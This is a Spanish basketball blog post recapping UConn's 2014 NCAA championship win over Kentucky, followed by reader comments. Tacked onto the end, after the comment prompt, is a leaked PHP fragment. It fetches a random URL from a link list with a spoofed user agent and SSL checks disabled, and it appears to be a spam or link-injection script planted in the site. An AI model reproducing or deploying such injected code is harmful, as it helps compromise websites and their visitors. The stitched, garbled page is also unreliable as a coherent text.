Los Connecticut Huskies son los nuevos campeones universitarios

08 de April de 2014 por txusma

Y ocurrió justo lo que predijo nuestro compañero Ruxixón: Los Huskies salieron con el cuchillo entre los dientes y cuando quedaban 6 minutos para terminar la primera parte ganaban por 15 puntos de diferencia a unos Wildcats que no habían acabado de salir del vestuario. Shabazz Napier (22p, 6-18 TC, 6r) y Ryan Boatright (14p, 5-6 TC) ya habían anotado 13 puntos en los primeros 9 minutos cuando los gemelos Harrison, a los que amargaron toda la noche, no habían conseguido estrenarse todavía. Sirva como ejemplo de la diferencia de actitud en esos primeros compases de partido. Pero a partir del minuto 15 Kentucky despertó, apretó las clavijas (solo Napier por parte de UConn fue capaz de anotar un par de canastas antes del descanso) y logró reducir la diferencia hasta los 4 puntos. Parecía que había pasado el peor momento para los de Calipari y que en la 2ª parte podría imponer por fin, su poderoso juego interior.

Los segundos 20 minutos empezaron con muchos nervios por parte de ambos equipos. El marcador quedó estático en un 34-37 para los Huskies durante casi 4 minutos de juego y cuando se movió fue para colocar a los Wildcats a un solo punto. Sin embargo, volvió a notarse la bizoñez y la experiencia de Kentucky que de nuevo vio como Connecticut se escapaba en el marcador y se iba a los 9 puntos de ventaja a falta de 11 minutos para el final del partido. En ese momento, llegó una de las jugadas del partido y probablemente del campeonato: el estratosférico mate de James Young (20p, 5-13 TC, 7r) por encima de toda la defensa de los Huskies.  La acción espoleó a sus compañeros que consiguieron volver a ponerse a un solo punto y tener, incluso, oportunidad para ponerse por delante en el marcador. Con 47-48 Aaron Harrison (7p, 3-7 TC) falló un triple que podría haber sido decisivo ya que Kentucky nunca más estuvo tan cerca de sus rivales. Un par de triples de Napier y Niels Giffey (1op) volvieron a conceder a los suyos una pequeña ventaja que ya no abandonaron hasta el final de partido. 

Una vez más la defensa de UConn ha resultado un factor diferencial. Dejaron a los Wildcats en 54 puntos con un 39.1% de acierto en TC. Sus anteriores víctimas, Gators y Spartans, tampoco llegaron a los 55 puntos ni al 40%. Eso, unido a su gran acierto en los tiros libres (10 de 10, primera vez que sucede algo parecido en una final), los errores del rival desde la línea (13 de 24 nada menos, apenas un 54%) y a la figura de Shabazz Napier (junto a Derrick Rose, Larry Bird y Kemba Walker, únicos jugadores capaces de conseguir más de 125 puntos, 25 rebotes y 25 asistencias en un mismo torneo), le han dado a Connecticut su 4º título nacional.

Punto y final a un gran torneo. ¡Larga vida a la March Madness!

Comenta

4 comentarios a esta entrada

  1. Enzo dice:
    #1

    Shabazz Napier se presentara al Draft ?

      Citar

  2. Vader dice:
    #2

    Enzo:
    Shabazz Napier se presentara al Draft ?

    Parece que si, en los mocks le dan entre el 20-25 de la primera ronda y a Young sobre el 20. Habra que ver si mejoran posiciones o incluso si alguno de ellos se queda otro año más en la universidad.

    Saludos

      Citar

  3. rumbero dice:
    #3

    Bravo por el gran seguimiento que habéis ido haciendo para aquellos que no hemos dispuesto de mucho tiempo para la March Madness. Si ha ganado Kevin Ollie yo me voy contento 😀

      Citar

  4. Ruxixon dice:
    #4

    Ha sido tremendo la capacidad de Kevin Ollie de minimizar,y muchas veces anular,el impacto de las fortalezas del rival.Esa ha sido la clave para el título de UCONN,que pone el punto final de la temporada universitaria.Gran torneo,de gran nivel bajo mi punto de vista,gracias en buena medida a ese buen número de sorpresas,y con el triunfo de un equipo por el que pocos apostaban.

    Ahora ya a pensar en todos estos jugadores en clave de draft.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>